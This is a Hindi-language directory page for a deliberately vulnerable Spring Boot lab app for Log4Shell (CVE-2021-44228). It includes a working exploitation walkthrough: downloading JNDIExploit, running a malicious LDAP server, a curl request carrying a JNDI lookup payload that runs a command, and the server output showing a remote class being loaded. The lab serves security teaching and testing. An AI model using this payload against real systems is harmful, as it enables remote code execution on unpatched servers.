Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/prmawyer/log4shell-vulnerable-app
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubprmawyer/log4shell-vulnerable-app

log4shell-vulnerable-app

Log4Shell (CVE-2021-44228) के प्रति संवेदनशील Spring Boot वेब एप्लिकेशन।

रिपॉजिटरी देखें
1 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Log4Shell नमूना संवेदनशील अनुप्रयोग (CVE-2021-44228) - दो बार संपादित

इस रिपॉज़िटरी में CVE-2021-44228 के प्रति संवेदनशील एक Spring Boot वेब अनुप्रयोग है, जिसे Log4Shell उपनाम दिया गया है।

यह Log4j 2.14.1 (spring-boot-starter-log4j2 2.6.1 के माध्यम से) और JDK 1.8.0_181 का उपयोग करता है।

अनुप्रयोग चलाना

इसे चलाएँ:

root@kitploit:~
docker run --name vulnerable-app --rm -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app@sha256:6f88430688108e512f7405ac3c73d47f5c370780b94182854ea2cddc6bd59929

शोषण के चरण

नोट: यह मूल LunaSec सलाह से अत्यधिक प्रेरित है। इसे अपने जोखिम पर चलाएँ, अधिमानतः सैंडबॉक्स वातावरण में एक VM में।

अद्यतन (दिसंबर 13): JNDIExploit रिपॉज़िटरी को GitHub से हटा दिया गया है (संभवतः, )... Wayback Machine द्वारा कैश किए गए संस्करण को डाउनलोड करने के लिए।

GitHub द्वारा नहीं
यहाँ क्लिक करें
  • एक दुर्भावनापूर्ण LDAP सर्वर शुरू करने के लिए JNDIExploit का उपयोग करें
root@kitploit:~
wget https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip
unzip JNDIExploit.v1.2.zip
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i your-private-ip -p 8888
  • फिर, निम्न का उपयोग करके शोषण को ट्रिगर करें:
root@kitploit:~
# will execute 'touch /tmp/pwned'
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-private-ip:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'
  • JNDIExploit के आउटपुट पर ध्यान दें, जो दर्शाता है कि उसने एक दुर्भावनापूर्ण LDAP प्रतिक्रिया भेजी है और दूसरे चरण का पेलोड परोसा है:
root@kitploit:~
[+] LDAP Server Start Listening on 1389...
[+] HTTP Server Start Listening on 8888...
[+] Received LDAP Query: Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo
[+] Paylaod: command
[+] Command: touch /tmp/pwned

[+] Sending LDAP ResourceRef result for Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo with basic remote reference payload
[+] Send LDAP reference result for Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo redirecting to http://192.168.1.143:8888/Exploitjkk87OnvOH.class
[+] New HTTP Request From /192.168.1.143:50119  /Exploitjkk87OnvOH.class
[+] Receive ClassRequest: Exploitjkk87OnvOH.class
[+] Response Code: 200
  • यह पुष्टि करने के लिए कि कोड निष्पादन सफल रहा, ध्यान दें कि संवेदनशील अनुप्रयोग चलाने वाले कंटेनर में /tmp/pwned.txt फ़ाइल बनाई गई थी:
root@kitploit:~
$ docker exec vulnerable-app ls /tmp
...
pwned
...

संदर्भ

https://www.lunasec.io/docs/blog/log4j-zero-day/ https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/

योगदानकर्ता

@christophetd @rayhan0x01

टूल डाउनलोड करें